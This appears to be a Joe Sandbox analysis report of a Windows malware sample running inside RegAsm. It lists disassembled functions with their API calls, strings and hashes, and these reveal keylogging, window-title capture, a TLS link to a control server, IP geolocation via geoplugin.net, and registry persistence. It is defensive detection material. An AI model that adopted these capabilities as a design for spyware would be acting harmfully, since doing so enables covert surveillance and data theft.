Opcode ID: 37b1bb3a0d30f17b52b07895542944880f65f934667ff10557e506737dee5ee7
Instruction ID: 324fc11d7bea0fba9c16e2c7d7b547a311b01f704130931fc4cc70caa797af2d
Opcode Fuzzy Hash: 37b1bb3a0d30f17b52b07895542944880f65f934667ff10557e506737dee5ee7
Instruction Fuzzy Hash: 22526B31A001155ACB18F732DD96AFE73769F90344F6041BFE40A761E2EF781E858A5D

Function 00414D86 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
LoadLibraryA.KERNEL32(?), ref: 00414E17
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
FreeLibrary.KERNEL32(00000000), ref: 00414E3E
LoadLibraryA.KERNEL32(?), ref: 00414E76
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
FreeLibrary.KERNEL32(00000000), ref: 00414E8F
GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
FreeLibrary.KERNEL32(00000000), ref: 00414EB5

Strings

getaddrinfo, xrefs: 00414D93, 00414E31, 00414E82
\ws2_32, xrefs: 00414DFF
\wship6, xrefs: 00414E5E
getnameinfo, xrefs: 00414DA2
freeaddrinfo, xrefs: 00414DB2

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeProc$Load$DirectorySystem
String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
API String ID: 2490988753-744132762
Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE

Function 0040A726 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00001388), ref: 0040A740

Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000), ref: 0040A6EE

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
PathFileExistsW.SHLWAPI(00000000), ref: 0040A81E

Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E

SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927

Strings

PG, xrefs: 0040A907
PG, xrefs: 0040A7AC
8SG, xrefs: 0040A802
pQG, xrefs: 0040A761
pQG, xrefs: 0040A771
8SG, xrefs: 0040A7F7

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
String ID: 8SG$8SG$pQG$pQG$PG$PG
API String ID: 3795512280-1152054767
Opcode ID: 677456a4732d5fb77e9c8745959e99ef54ead223a942f07a0b0fb3c37e482db7
Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
Opcode Fuzzy Hash: 677456a4732d5fb77e9c8745959e99ef54ead223a942f07a0b0fb3c37e482db7
Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E

Function 004048C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32(?,?,?), ref: 004048E0
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
WSAGetLastError.WS2_32 ref: 00404A21

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

Strings

TLS Error 1, xrefs: 00404937
TLS Error 2, xrefs: 00404955
Connection Failed: , xrefs: 00404A43
TLS Error 3, xrefs: 004049D8
Connection Refused, xrefs: 00404A76
TLS Handshake... | , xrefs: 00404904
TLS Authentication Failed, xrefs: 00404999

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateEvent$ErrorLastLocalTimeconnect
String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
API String ID: 994465650-2151626615
Opcode ID: 99cb689bb5f18c3443efc10de2b69162055e835058a5c35f32943c28cb679500
Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
Opcode Fuzzy Hash: 99cb689bb5f18c3443efc10de2b69162055e835058a5c35f32943c28cb679500
Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF

Function 0040ACD6 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__Init_thread_footer.LIBCMT ref: 0040AD38
Sleep.KERNEL32(000001F4), ref: 0040AD43
GetForegroundWindow.USER32 ref: 0040AD49
GetWindowTextLengthW.USER32 ref: 0040AD52
GetWindowTextW.USER32 ref: 0040AD86
Sleep.KERNEL32(000003E8), ref: 0040AE54

Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662

Strings

[, xrefs: 0040ADEE
], xrefs: 0040ADE8
{ User has been idle for , xrefs: 0040AE86
minutes }, xrefs: 0040AE7A

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Window$SleepText$EventForegroundInit_thread_footerLength
String ID: [${ User has been idle for $ minutes }$]
API String ID: 911427763-3954389425
Opcode ID: af3cf2329a29d0ead1f6790201367748a0b563353980fa9fd476e2dccae2fe78
Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
Opcode Fuzzy Hash: af3cf2329a29d0ead1f6790201367748a0b563353980fa9fd476e2dccae2fe78
Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F

Function 0040DA34 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLongPathNameW.KERNEL32 ref: 0040DB9A

Strings

\SysWOW64, xrefs: 0040DB00
Temp, xrefs: 0040DA66
UserProfile, xrefs: 0040DB58
ProgramData, xrefs: 0040DB5F
AppData, xrefs: 0040DB51
\system32, xrefs: 0040DAAE
SystemDrive, xrefs: 0040DA91
WinDir, xrefs: 0040DA9B, 0040DABD, 0040DB0F
ProgramFiles, xrefs: 0040DB6E

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LongNamePath
String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
API String ID: 82841172-425784914
Opcode ID: f699c62159184187b538f79cdc1dbfdb69b721564b31670cb9aa7a5423fa7b62
Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
Opcode Fuzzy Hash: f699c62159184187b538f79cdc1dbfdb69b721564b31670cb9aa7a5423fa7b62
Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F

Function 0044AC49 Relevance: 12.2, APIs: 8, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
__alloca_probe_16.LIBCMT ref: 0044ACDB
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
__alloca_probe_16.LIBCMT ref: 0044ADC0
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
__freea.LIBCMT ref: 0044AE30

Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169

__freea.LIBCMT ref: 0044AE39
__freea.LIBCMT ref: 0044AE5E

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
Opcode Fuzzy Hash: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A

Function 0041B380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
InternetCloseHandle.WININET(00000000), ref: 0041B41C
InternetCloseHandle.WININET(00000000), ref: 0041B41F

Strings

http://geoplugin.net/json.gp, xrefs: 0041B3B7

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileRead
String ID: http://geoplugin.net/json.gp
API String ID: 3121278467-91888290
Opcode ID: cdafa812d0069ca1bd3c44b07efc9bb2dcc90a2ad610c892a77a7760868e404d
Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
Opcode Fuzzy Hash: cdafa812d0069ca1bd3c44b07efc9bb2dcc90a2ad610c892a77a7760868e404d
Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA

Function 0041C3F1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C44D
CloseHandle.KERNEL32(00000000), ref: 0041C459
WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C46A
CloseHandle.KERNEL32(00000000), ref: 0041C477

Strings

hpF, xrefs: 0041C3F2

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreatePointerWrite
String ID: hpF
API String ID: 1852769593-151379673
Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A

Function 0041B2C3 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8

Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
Part of subcall function 004135A6: RegQueryValueExA.KERNEL32 ref: 004135E7
Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2

StrToIntA.SHLWAPI(00000000), ref: 0041B33C

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0041B2D7, 0041B2E1, 0041B322
(32 bit), xrefs: 0041B36F
ProductName, xrefs: 0041B2D2
(64 bit), xrefs: 0041B368
CurrentBuildNumber, xrefs: 0041B31D

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseCurrentOpenProcessQueryValue
String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 1866151309-2070987746
Opcode ID: 8f8f5d60ce35d1a1c8195802feeff86a127f68f3eb7fb2a0a498f7b0ec669ebf
Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
Opcode Fuzzy Hash: 8f8f5d60ce35d1a1c8195802feeff86a127f68f3eb7fb2a0a498f7b0ec669ebf
Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE

Function 0040A675 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58
sleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
CloseHandle.KERNEL32(00000000), ref: 0040A6EE

Strings

XQG, xrefs: 0040A6A0

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSizeSleep
String ID: XQG
API String ID: 1958988193-3606453820
Opcode ID: ed692bf81f71d99d64d0e48405d0f3cb823898ebec9c5078a7592842c921da17
Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
Opcode Fuzzy Hash: ed692bf81f71d99d64d0e48405d0f3cb823898ebec9c5078a7592842c921da17
Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E

Function 00415AEA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00415B0F
GetTickCount.KERNEL32 ref: 00415B86

Strings

!D@, xrefs: 00417089
NG, xrefs: 00415B3E

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CountEventTick
String ID: !D@$NG
API String ID: 180926312-2721294649
Opcode ID: 6aa289381ca7ffc7839bd185018c03a8b122282be0e3cf198c7b8b30a4e99bb5
Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
Opcode Fuzzy Hash: 6aa289381ca7ffc7839bd185018c03a8b122282be0e3cf198c7b8b30a4e99bb5
Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A

Function 0040A179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040A20E
CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040A21A

Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3

Strings

Offline Keylogger Started, xrefs: 0040A19B, 0040A1A2, 0040A1CF

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTimewsprintf
String ID: Offline Keylogger Started
API String ID: 465354869-4114347211
Opcode ID: e8215c935415644a741e178cef246bea46bfec4a592ac60f75e4063261735619
Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
Opcode Fuzzy Hash: e8215c935415644a741e178cef246bea46bfec4a592ac60f75e4063261735619
Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB

Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404F81
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404FCD
CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0

Strings

KeepAlive | Enabled | Timeout: , xrefs: 00404F94

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Create$EventLocalThreadTime
String ID: KeepAlive | Enabled | Timeout:
API String ID: 2532271599-1507639952
Opcode ID: 560c203c767acd10f1bafe677f0d9cbc016093e56ac0604e807a07335adf4d88
Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
Opcode Fuzzy Hash: 560c203c767acd10f1bafe677f0d9cbc016093e56ac0604e807a07335adf4d88
Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA

Function 0041376F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000), ref: 004137A6
RegCloseKey.KERNEL32(?), ref: 004137B1

Strings

pth_unenc, xrefs: 00413773

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: pth_unenc
API String ID: 1818849710-4028850238
Opcode ID: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
Opcode Fuzzy Hash: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54

Function 00404CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
CloseHandle.KERNEL32(?), ref: 00404DDB

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID:
API String ID: 3360349984-0
Opcode ID: 896836ce6e67791e20d0eed4e42f92f466038b3ea1b67db69a0d6ef4832fab86
Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
Opcode Fuzzy Hash: 896836ce6e67791e20d0eed4e42f92f466038b3ea1b67db69a0d6ef4832fab86
Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666

Function 00448566 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8

Function 0040D069 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
GetLastError.KERNEL32 ref: 0040D083

Strings

SG, xrefs: 0040D069

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateErrorLastMutex
String ID: SG
API String ID: 1925916568-3189917014
Opcode ID: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
Opcode Fuzzy Hash: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519

Function 004135A6 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
RegQueryValueExA.KERNEL32 ref: 004135E7
RegCloseKey.KERNEL32(?), ref: 004135F2

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
Opcode Fuzzy Hash: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4

Function 004136F8 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 00413714
RegQueryValueExA.KERNEL32 ref: 0041372D
RegCloseKey.KERNEL32(00000000), ref: 00413738

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
Instruction ID: 3f277cad741e4f631881634228dfc272d65c1146f3ef4f3c344e6cfa7cb73972
Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
Instruction Fuzzy Hash: 1C018BB1400229FBDF216FA1DC04DEB3F38EF05751F004065BE08621A1D6358AA5DBA4

Function 00413549 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
RegQueryValueExA.KERNEL32 ref: 00413587
RegCloseKey.KERNEL32(?), ref: 00413592

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94

Function 004134FF Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413516
RegQueryValueExA.KERNEL32 ref: 0041352A
RegCloseKey.KERNEL32(?), ref: 00413535

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
Instruction ID: ffaae2385a847085e6fb085aa4760e2a706d619ab1068a3de776aab9102a8dd7
Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
